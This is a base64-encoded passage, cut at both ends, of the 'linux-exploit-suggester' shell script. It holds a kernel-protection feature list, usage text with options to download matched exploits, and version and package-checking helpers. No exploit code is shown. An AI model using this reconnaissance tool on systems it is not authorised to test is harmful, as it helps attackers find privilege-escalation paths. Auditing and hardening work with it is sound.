i5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbWVwLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBlcnZpc29yIE1vZGUgQWNjZXNzIFByZXZlbnRpb24gKFNNQVApIHN1cHBvcnQKYXZhaWxhYmxlOiB2ZXI+PTMuNwplbmFibGVkOiBjbWQ6Z3JlcCAtcWkgc21hcCAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc21hcC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogM3JkIHBhcnR5IGtlcm5lbCBwcm90ZWN0aW9uIG1lY2hhbmlzbXM6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHcnNlY3VyaXR5CmF2YWlsYWJsZTogQ09ORklHX0dSS0VSTlNFQz15CmVuYWJsZWQ6IGNtZDp0ZXN0IC1jIC9kZXYvZ3JzZWMKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhWAphdmFpbGFibGU6IENPTkZJR19QQVg9eQplbmFibGVkOiBjbWQ6dGVzdCAteCAvc2Jpbi9wYXhjdGwKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExpbnV4IEtlcm5lbCBSdW50aW1lIEd1YXJkIChMS1JHKSBrZXJuZWwgbW9kdWxlCmVuYWJsZWQ6IGNtZDp0ZXN0IC1kIC9wcm9jL3N5cy9sa3JnCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvbGtyZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogQXR0YWNrIFN1cmZhY2U6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2VyIG5hbWVzcGFjZXMgZm9yIHVucHJpdmlsZWdlZCBhY2NvdW50cwphdmFpbGFibGU6IENPTkZJR19VU0VSX05TPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvdXNlcl9ucy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogVW5wcml2aWxlZ2VkIGFjY2VzcyB0byBicGYoKSBzeXN0ZW0gY2FsbAphdmFpbGFibGU6IENPTkZJR19CUEZfU1lTQ0FMTD15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCE9MQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTeXNjYWxscyBmaWx0ZXJpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0VDQ09NUD15CmVuYWJsZWQ6IGNtZDpncmVwIC1pIFNlY2NvbXAgL3Byb2Mvc2VsZi9zdGF0dXMgfCBhd2sgJ3twcmludCBcJDJ9JwphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBwb3J0IGZvciAvZGV2L21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cHBvcnQgZm9yIC9kZXYva21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWS01FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGV2a21lbS5tZApFT0YKKQoKCnZlcnNpb24oKSB7CiAgICBlY2hvICJsaW51eC1leHBsb2l0LXN1Z2dlc3RlciAiJFZFUlNJT04iLCBtemV0LCBodHRwczovL3otbGFicy5ldSwgTWFyY2ggMjAxOSIKfQoKdXNhZ2UoKSB7CiAgICBlY2hvICJMRVMgdmVyLiAkVkVSU0lPTiAoaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyKSBieSBAX216ZXRfIgogICAgZWNobwogICAgZWNobyAiVXNhZ2U6IGxpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoIFtPUFRJT05TXSIKICAgIGVjaG8KICAgIGVjaG8gIiAtViB8IC0tdmVyc2lvbiAgICAgICAgICAgICAgIC0gcHJpbnQgdmVyc2lvbiBvZiB0aGlzIHNjcmlwdCIKICAgIGVjaG8gIiAtaCB8IC0taGVscCAgICAgICAgICAgICAgICAgIC0gcHJpbnQgdGhpcyBoZWxwIgogICAgZWNobyAiIC1rIHwgLS1rZXJuZWwgPHZlcnNpb24+ICAgICAgLSBwcm92aWRlIGtlcm5lbCB2ZXJzaW9uIgogICAgZWNobyAiIC11IHwgLS11bmFtZSA8c3RyaW5nPiAgICAgICAgLSBwcm92aWRlICd1bmFtZSAtYScgc3RyaW5nIgogICAgZWNobyAiIC0tc2tpcC1tb3JlLWNoZWNrcyAgICAgICAgICAgLSBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyAoa2VybmVsIGNvbmZpZywgc3lzY3RsKSB0byBkZXRlcm1pbmUgaWYgZXhwbG9pdCBpcyBhcHBsaWNhYmxlIgogICAgZWNobyAiIC0tc2tpcC1wa2ctdmVyc2lvbnMgICAgICAgICAgLSBza2lwIGNoZWNraW5nIGZvciBleGFjdCB1c2Vyc3BhY2UgcGFja2FnZSB2ZXJzaW9uIChoZWxwcyB0byBhdm9pZCBmYWxzZSBuZWdhdGl2ZXMpIgogICAgZWNobyAiIC1wIHwgLS1wa2dsaXN0LWZpbGUgPGZpbGU+ICAgLSBwcm92aWRlIGZpbGUgd2l0aCAnZHBrZyAtbCcgb3IgJ3JwbSAtcWEnIGNvbW1hbmQgb3V0cHV0IgogICAgZWNobyAiIC0tY3ZlbGlzdC1maWxlIDxmaWxlPiAgICAgICAgLSBwcm92aWRlIGZpbGUgd2l0aCBMaW51eCBrZXJuZWwgQ1ZFcyBsaXN0IgogICAgZWNobyAiIC0tY2hlY2tzZWMgICAgICAgICAgICAgICAgICAgLSBsaXN0IHNlY3VyaXR5IHJlbGF0ZWQgZmVhdHVyZXMgZm9yIHlvdXIgSFcva2VybmVsIgogICAgZWNobyAiIC1zIHwgLS1mZXRjaC1zb3VyY2VzICAgICAgICAgLSBhdXRvbWF0aWNhbGx5IGRvd25sb2FkcyBzb3VyY2UgZm9yIG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtYiB8IC0tZmV0Y2gtYmluYXJpZXMgICAgICAgIC0gYXV0b21hdGljYWxseSBkb3dubG9hZHMgYmluYXJ5IGZvciBtYXRjaGVkIGV4cGxvaXQgaWYgYXZhaWxhYmxlIgogICAgZWNobyAiIC1mIHwgLS1mdWxsICAgICAgICAgICAgICAgICAgLSBzaG93IGZ1bGwgaW5mbyBhYm91dCBtYXRjaGVkIGV4cGxvaXQiCiAgICBlY2hvICIgLWcgfCAtLXNob3J0ICAgICAgICAgICAgICAgICAtIHNob3cgc2hvcnRlbiBpbmZvIGFib3V0IG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtLWtlcm5lbHNwYWNlLW9ubHkgICAgICAgICAgIC0gc2hvdyBvbmx5IGtlcm5lbCB2dWxuZXJhYmlsaXRpZXMiCiAgICBlY2hvICIgLS11c2Vyc3BhY2Utb25seSAgICAgICAgICAgICAtIHNob3cgb25seSB1c2Vyc3BhY2UgdnVsbmVyYWJpbGl0aWVzIgogICAgZWNobyAiIC1kIHwgLS1zaG93LWRvcyAgICAgICAgICAgICAgLSBzaG93IGFsc28gRG9TZXMgaW4gcmVzdWx0cyIKfQoKZXhpdFdpdGhFcnJNc2coKSB7CiAgICBlY2hvICIkMSIgMT4mMgogICAgZXhpdCAxCn0KCiMgZXh0cmFjdHMgYWxsIGluZm9ybWF0aW9uIGZyb20gb3V0cHV0IG9mICd1bmFtZSAtYScgY29tbWFuZApwYXJzZVVuYW1lKCkgewogICAgbG9jYWwgdW5hbWU9JDEKCiAgICBLRVJORUw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JyB8IGN1dCAtZCAnLScgLWYgMSkKICAgIEtFUk5FTF9BTEw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JykKICAgIEFSQ0g9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJChORi0xKX0nKQoKICAgIE9TPSIiCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnZGViJyAmJiBPUz0iZGViaWFuIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ3VidW50dScgJiYgT1M9InVidW50dSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLUFSQ0gnICYmIE9TPSJhcmNoIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtZGVlcGluJyAmJiBPUz0iZGVlcGluIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtTUFOSkFSTycgJiYgT1M9Im1hbmphcm8iCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnXC5mYycgJiYgT1M9ImZlZG9yYSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLmVsJyAmJiBPUz0iUkhFTCIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLm1nYScgJiYgT1M9Im1hZ2VpYSIKCiAgICAjICd1bmFtZSAtYScgb3V0cHV0IGRvZXNuJ3QgY29udGFpbiBkaXN0cmlidXRpb24gbnVtYmVyIChhdCBsZWFzdCBub3QgaW4gY2FzZSBvZiBhbGwgZGlzdHJvcykKfQoKZ2V0UGtnTGlzdCgpIHsKICAgIGxvY2FsIGRpc3Rybz0kMQogICAgbG9jYWwgcGtnbGlzdF9maWxlPSQyCiAgICAKICAgICMgdGFrZSBwYWNrYWdlIGxpc3RpbmcgZnJvbSBwcm92aWRlZCBmaWxlICYgZGV0ZWN0IGlmIGl0J3MgJ3JwbSAtcWEnIGxpc3Rpbmcgb3IgJ2Rwa2cgLWwnIG9yICdwYWNtYW4gLVEnIGxpc3Rpbmcgb2Ygbm90IHJlY29nbml6ZWQgbGlzdGluZwogICAgaWYgWyAiJG9wdF9wa2dsaXN0X2ZpbGUiID0gInRydWUiIC1hIC1lICIkcGtnbGlzdF9maWxlIiBdOyB0aGVuCgogICAgICAgICMgdWJ1bnR1L2RlYmlhbiBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGlmIFsgJChoZWFkIC0xICIkcGtnbGlzdF9maWxlIiB8IGdyZXAgJ0Rlc2lyZWQ9VW5rbm93bi9JbnN0YWxsL1JlbW92ZS9QdXJnZS9Ib2xkJykgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIgfCBhd2sgJ3twcmludCAkMiItIiQzfScgfCBzZWQgJ3MvOmFtZDY0Ly9nJykKCiAgICAgICAgICAgIE9TPSJkZWJpYW4iCiAgICAgICAgICAgIFsgIiQoZ3JlcCB1YnVudHUgIiRwa2dsaXN0X2ZpbGUiKSIgXSAmJiBPUz0idWJ1bnR1IgogICAgICAgICMgcmVkaGF0IHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wuZWxbMS05XStbXC5fXScgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iUkhFTCIKICAgICAgICAjIGZlZG9yYSBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGVsaWYgWyAiJChncmVwIC1FICdcLmZjWzEtOV0rJ2kgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iZmVkb3JhIgogICAgICAgICMgbWFnZWlhIHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wubWdhWzEtOV0rJyAiJHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIpCiAgICAgICAgICAgIE9TPSJtYWdlaWEiCiAgICAgICAgIyBwYWNtYW4gcGFja2FnZSBsaXN0aW5nIGZpbGUKICAgICAgICBlbGlmIFsgIiQoZ3JlcCAtRSAnXCBbMC05XStcLicgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiIHwgYXdrICd7cHJpbnQgJDEiLSIkMn0nKQogICAgICAgICAgICBPUz0iYXJjaCIKICAgICAgICAjIGZpbGUgbm90IHJlY29nbml6ZWQgLSBza2lwcGluZwogICAgICAgIGVsc2UKICAgICAgICAgICAgUEtHX0xJU1Q9IiIKICAgICAgICBmaQoKICAgIGVsaWYgWyAiJGRpc3RybyIgPSAiZGViaWFuIiAtbyAiJGRpc3RybyIgPSAidWJ1bnR1IiAtbyAiJGRpc3RybyIgPSAiZGVlcGluIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChkcGtnIC1sIHwgYXdrICd7cHJpbnQgJDIiLSIkM30nIHwgc2VkICdzLzphbWQ2NC8vZycpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gIlJIRUwiIC1vICIkZGlzdHJvIiA9ICJmZWRvcmEiIC1vICIkZGlzdHJvIiA9ICJtYWdlaWEiIF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKHJwbSAtcWEpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gImFyY2giIC1vICIkZGlzdHJvIiA9ICJtYW5qYXJvIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChwYWNtYW4gLVEgfCBhd2sgJ3twcmludCAkMSItIiQyfScpCiAgICBlbGlmIFsgLXggL3Vzci9iaW4vZXF1ZXJ5IF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKC91c3IvYmluL2VxdWVyeSAtLXF1aWV0IGxpc3QgJyonIC1GICckbmFtZTokdmVyc2lvbicgfCBjdXQgLWQvIC1mMi0gfCBhd2sgJ3twcmludCAkMSI6IiQyfScpCiAgICBlbHNlCiAgICAgICAgIyBwYWNrYWdlcyBsaXN0aW5nIG5vdCBhdmFpbGFibGUKICAgICAgICBQS0dfTElTVD0iIgogICAgZmkKfQoKIyBmcm9tOiBodHRwczovL3N0YWNrb3ZlcmZsb3cuY29tL3F1ZXN0aW9ucy80MDIzODMwL2hvdy1jb21wYXJlLXR3by1zdHJpbmdzLWluLWRvdC1zZXBhcmF0ZWQtdmVyc2lvbi1mb3JtYXQtaW4tYmFzaAp2ZXJDb21wYXJpc2lvbigpIHsKCiAgICBpZiBbWyAkMSA9PSAkMiBdXQogICAgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBmaQoKICAgIGxvY2FsIElGUz0uCiAgICBsb2NhbCBpIHZlcjE9KCQxKSB2ZXIyPSgkMikKCiAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjEgd2l0aCB6ZXJvcwogICAgZm9yICgoaT0keyN2ZXIxW0BdfTsgaTwkeyN2ZXIyW0BdfTsgaSsrKSkKICAgIGRvCiAgICAgICAgdmVyMVtpXT0wCiAgICBkb25lCgogICAgZm9yICgoaT0wOyBpPCR7I3ZlcjFbQF19OyBpKyspKQogICAgZG8KICAgICAgICBpZiBbWyAteiAke3ZlcjJbaV19IF1dCiAgICAgICAgdGhlbgogICAgICAgICAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjIgd2l0aCB6ZXJvcwogICAgICAgICAgICB2ZXIyW2ldPTAKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA+IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDEKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA8IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDIKICAgICAgICBmaQogICAgZG9uZQoKICAgIHJldHVybiAwCn0KCmRvVmVyc2lvbkNvbXBhcmlzaW9uKCkgewogICAgbG9jYWwgcmVxVmVyc2lvbj0iJDEiCiAgICBsb2NhbCByZXFSZWxhdGlvbj0iJDIiCiAgICBsb2NhbCBjdXJyZW50VmVyc2lvbj0iJDMiCgogICAgdmVyQ29tcGFyaXNpb24gJGN1cnJlbnRWZXJzaW9uICRyZXFWZXJzaW9uCiAgICBjYXNlICQ/IGluCiAgICAgICAgMCkgY3VycmVudFJlbGF0aW9uPSc9Jzs7CiAgICAgICAgMSkgY3VycmVudFJlbGF0aW9uPSc+Jzs7CiAgICAgICAgMikgY3VycmVudFJlbGF0aW9uPSc8Jzs7CiAgICBlc2FjCgogICAgaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPSIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPSIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkcmVxUmVsYXRpb24iID09ICI+IiBdOyB0aGVuCiAgICAgICAgWyAkY3VycmVudFJlbGF0aW9uID09ICI+IiBdICYmIHJldHVybiAwCiAgICBlbGlmIFsgIiRyZXFSZWxhdGlvbiIgPT0gIjwiIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPj0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj4iIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPD0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCn0KCmNvbXBhcmVWYWx1ZXMoKSB7CiAgICBjdXJWYWw9JDEKICAgIHZhbD0kMgogICAgc2lnbj0kMwoKICAgIGlmIFsgIiRzaWduIiA9PSAiPT0iIF07IHRoZW4KICAgICAgICBbICIkdmFsIiA9PSAiJGN1clZhbCIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkc2lnbiIgPT0gIiE9IiBdOyB0aGVuCiAgICAgICAgWyAiJHZhbCIgIT0gIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCgogICAgcmV0dXJuIDEKfQoKY2hlY2tSZXF1aXJlbWVudCgpIHsKICAgICNlY2hvICJDaGVja2luZyByZXF1aXJlbWVudDogJDEiCiAgICBsb2NhbCBJTj0iJDEiCiAgICBsb2NhbCBwa2dOYW1lPSIkezI6NH0iCgogICAgaWYgW1sgIiRJTiIgPX4gXnBrZz0uKiQgXV07IHRoZW4KCiAgICAgICAgIyBhbHdheXMgdHJ1ZSBmb3IgTGludXggT1MKICAgICAgICBbICR7cGtnTmFtZX0gPT0gImxpbnV4LWtlcm5lbCIgXSAmJiByZXR1cm4gMAoKICAgICAgICAjIHZlcmlmeSBpZiBwYWNrYWdlIGlzIHByZXNlbnQgCiAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKICAgICAgICBpZiBbIC1uICIkcGtnIiBdOyB0aGVuCiAgICAgICAgICAgIHJldHVybiAwCiAgICAgICAgZmkKCiAgICBlbGlmIFtbICIkSU4iID1+IF52ZXIuKiQgXV07IHRoZW4KICAgICAgICB2ZXJzaW9uPSIke0lOLy9bXjAtOS5dL30iCiAgICAgICAgcmVzdD0iJHtJTiN2ZXJ9IgogICAgICAgIG9wZXJhdG9yPSR7cmVzdCUkdmVyc2lvbn0KCiAgICAgICAgaWYgWyAiJHBrZ05hbWUiID09ICJsaW51eC1rZXJuZWwiIC1vICIkb3B0X2NoZWNrc2VjX21vZGUiID09ICJ0cnVlIiBdOyB0aGVuCgogICAgICAgICAgICAjIGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlIHNraXAga2VybmVsIHZlcnNpb24gY29tcGFyaXNpb24KICAgICAgICAgICAgWyAiJG9wdF9jdmVsaXN0X2ZpbGUiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgIGRvVmVyc2lvbkNvbXBhcmlzaW9uICR2ZXJzaW9uICRvcGVyYXRvciAkS0VSTkVMICYmIHJldHVybiAwCiAgICAgICAgZWxzZQogICAgICAgICAgICAjIGV4dHJhY3QgcGFja2FnZSB2ZXJzaW9uIGFuZCBjaGVjayBpZiByZXF1aXJlbW50IGlzIHRydWUKICAgICAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKCiAgICAgICAgICAgICMgc2tpcCAoaWYgcnVuIHdpdGggLS1za2lwLXBrZy12ZXJzaW9ucykgdmVyc2lvbiBjaGVja2luZyBpZiBwYWNrYWdlIHdpdGggZ2l2ZW4gbmFtZSBpcyBpbnN0YWxsZWQKICAgICAgICAgICAgWyAiJG9wdF9za2lwX3BrZ192ZXJzaW9ucyIgPSAidHJ1ZSIgLWEgLW4gIiRwa2ciIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgICMgdmVyc2lvbmluZzoKICAgICAgICAgICAgI2VjaG8gInBrZzogJHBrZyIKICAgICAgICAgICAgcGtnVmVyc2lvbj0kKGVjaG8gIiRwa2ciIHwgZ3JlcCAtRSAtaSAtbyAtZSAnLVtcLjAtOVwrOnBdK1stXCtdJyB8IGN1dCAtZCc6JyAtZjIgfCBzZWQgJ3MvW1wrLV0vL2cnIHwgc2VkICdzL3BbMC05XS8vZycpCiAgICAgICAgICAgICNlY2hvICJ2ZXJzaW9uOiAkcGtnVmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8gIm9wZXJhdG9yOiAkb3BlcmF0b3IiCiAgICAgICAgICAgICNlY2hvICJyZXF1aXJlZCB2ZXJzaW9uOiAkdmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8KICAgICAgICAgICAgZG9WZXJzaW9uQ29tcGFyaXNpb24gJHZlcnNpb24gJG9wZXJhdG9yICRwa2dWZXJzaW9uICYmIHJldHVybiAwCiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXng4Nl82NCQgXV0gJiYgWyAiJEFSQ0giID09ICJ4ODZfNjQiIC1vICIkQVJDSCIgPT0gIiIgXTsgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBlbGlmIFtbICIkSU4iID1+IF54ODYkIF1dICYmIFsgIiRBUkNIIiA9PSAiaTM4NiIgLW8gIiRBUkNIIiA9PSAiaTY4NiIgLW8gIiRBUkNIIiA9PSAiIiBdOyB0aGVuCiAgICAgICAgcmV0dXJuIDAKICAgIGVsaWYgW1sgIiRJTiIgPX4gXkNPTkZJR18uKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIHNldCkgb3IgaWYgdXNlciBzYWlkIHNvICgtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJ0cnVlIiBdICYmIHJldHVybiAwCgogICAgICAgICMgaWYga2VybmVsIGNvbmZpZyBJUyBhdmFpbGFibGU6CiAgICAgICAgaWYgWyAtbiAiJEtDT05GSUciIF07IHRoZW4KICAgICAgICAgICAgaWYgJEtDT05GSUcgfCBncmVwIC1FIC1xaSAkSU47IHRoZW4KICAgICAgICAgICAgICAgIHJldHVybiAwOwogICAgICAgICAgICAjIHJlcXVpcmVkIG9wdGlvbiB3YXNuJ3QgZm91bmQsIGV4cGxvaXQgaXMgbm90IGFwcGxpY2FibGUKICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgcmV0dXJuIDE7CiAgICAgICAgICAgIGZpCiAgICAgICAgIyBjb25maWcgaXMgbm90IGF2YWlsYWJsZQogICAgICAgIGVsc2UKICAgICAgICAgICAgcmV0dXJuIDA7CiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXnN5c2N0bDouKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIG1vZGVzKSBvciBpZiB1c2VyIHNhaWQgc28gKC0tc2tpcC1tb3JlLWNoZWNrcykKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgc3lzY3RsQ29uZGl0aW9uPSIke0lOOjd9IgoKICAgICAgICAjIGV4dHJhY3Qgc3lzY3RsIGVudHJ5LCByZWxhdGlvbiBzaWduIGFuZCByZXF1aXJlZCB2YWx1ZQogICAgICAgIGlmIGVjaG8gJHN5c2N0bENvbmRpdGlvbiB8IGdyZXAgLXFpICIhPSI7IHRoZW4KICAgICAgICAgICAgc2lnbj0iIT0iCiAgICAgICAgZWxpZiBlY2hvICRzeXNjdGxDb25kaXRpb24gfCBncmVwIC1xaSAiPT0iOyB0aGVuCiAgICAgICAgICAgIHNpZ249Ij09IgogICAgICAgIGVsc2UKICAgICAgICAgICAgZXhpdFdpdGhFcnJNc2cgIldyb25nIHN5c2N0bCBjb25kaXRpb24uIFRoZXJlIGlzIHN5bnRheCBlcnJvciBpbiB5b3VyIGZlYXR1cmVzIERCLiBBYm9ydGluZy4iCiAgICAgICAgZmkKICAgICAgICB2YWw9JChlY2hvICIkc3lzY3RsQ29uZGl0aW9uIiB8IGF3ayAtRiAiJHNpZ24iICd7cHJpbnQgJDJ9JykKICAgICAgICBlbnRyeT0kKGVjaG8gIiRzeXNjdGxDb25kaXRpb24iIHwgYXdrIC1GICIkc2lnbiIgJ3twcmludCAkMX0nKQoKICAgICAgICAjIGdldCBjdXJyZW50IHNldHRpbmcgb2Ygc3lzY3RsIGVudHJ5CiAgICAgICAgY3VyVmFsPSQoL3NiaW4vc3lzY3RsIC1hIDI+IC9kZXYvbnVsbCB8IGdyZXAgIiRlbnRyeSIgfCBhd2sgLUYnPScgJ3twcmludCAkMn0nKQoKICAgICAgICAjIHNwZWNpYWwgY2FzZSBmb3IgLS1jaGVja3NlYyBtb2RlOiByZXR1cm4gMiBpZiB0aGVyZSBpcyBubyBzdWNoIHN3aXRjaCBpbiBzeXNjdGwKICAgICAgICBbIC16ICIkY3VyVmFsIiAtYSAiJG9wdF9jaGVja3NlY19tb2RlIiA9ICJ0cnVlIiBdICYmIHJldHVybiAyCgogICAgICAgICMgZm9yIG90aGVyIG1vZGVzOiBza2lwIGlmIHRoZXJlIGlzIG5vIHN1Y2ggc3dpdGNoIGluIHN5c2N0bAogICAgICAgIFsgLXogIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgIyBjb21wYXJlICYgcmV0dXJuIHJlc3VsdAogICAgICAgIGNvbXBhcmVWYWx1ZXMgJGN1clZhbCAkdmFsICRzaWduICYmIHJldHVybiAwCgogICAgZWxpZiBbWyAiJElOIiA9fiBeY21kOi4qJCBdXTsgdGhlbgoKICAgICAgICAjIHNraXAgaWYgY2hlY2sgaXMgbm90IGFwcGxpY2FibGUgK